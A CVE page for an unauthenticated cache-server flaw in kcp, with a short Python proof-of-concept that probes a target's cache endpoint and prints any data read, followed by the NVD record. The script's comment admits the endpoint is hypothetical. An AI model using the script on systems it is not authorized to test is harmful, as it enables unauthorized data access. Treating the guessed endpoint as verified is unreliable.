CVE-2026-39429

import requests import sys # PoC for CVE-2026-39429: Unauthenticated Cache Server Access # This script attempts to read/write from the exposed cache server without authentication. def check_vulnerability(target_url): """ Attempts to access the cache server endpoint. If the server responds without 401/403, it might be vulnerable. """ # Hypothetical endpoint for cache server based on vulnerability description cache_endpoint = f"{target_url}/cache/v1/read" try: # Attempt to read from cache without headers response = requests.get(cache_endpoint, timeout=5) if response.status_code == 200: print(f"[+] Potential Vulnerability Detected! Server responded with 200 OK.") print(f"[+] Data received: {response.text[:100]}...") return True elif response.status_code in [401, 403]: print("[-] Server requires authentication. Not vulnerable.") return False else: print(f"[?] Unexpected status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: python {sys.argv[0]} <http://target_ip:port>") sys.exit(1) target = sys.argv[1] print(f"[*] Checking {target} for CVE-2026-39429...") check_vulnerability(target)

{"cve": {"id": "CVE-2026-39429", "sourceIdentifier": "[email protected]", "published": "2026-04-08T21:16:59.313", "lastModified": "2026-04-15T19:15:39.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "kcp is a Kubernetes-like control plane for form-factors and use-cases beyond Kubernetes and container workloads. Prior to 0.30.3 and 0.29.3, the cache server is directly exposed by the root shard and has no authentication or authorization in place. This allows anyone who can access the root shard to read and write to the cache server. This vulnerability is fixed in 0.30.3 and 0.29.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-302"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kcp:kcp:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.29.3", "matchCriteriaId": "DFC8494E-4C32-4DC4-9093-197071C3FE3A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:kcp:kcp:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.30.0", "versionEndExcluding": "0.30.3", "matchCriteriaId": "0237B688-7AC2-4DDB-A5E2-D50D6591CF66"}]}]}], "references": [{"url": "https://github.com/kcp-dev/kcp/releases/tag/v0.29.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/kcp-dev/kcp/releases/tag/v0.30.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/kcp-dev/kcp/security/advisories/GHSA-3j3q-wp9x-585p", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}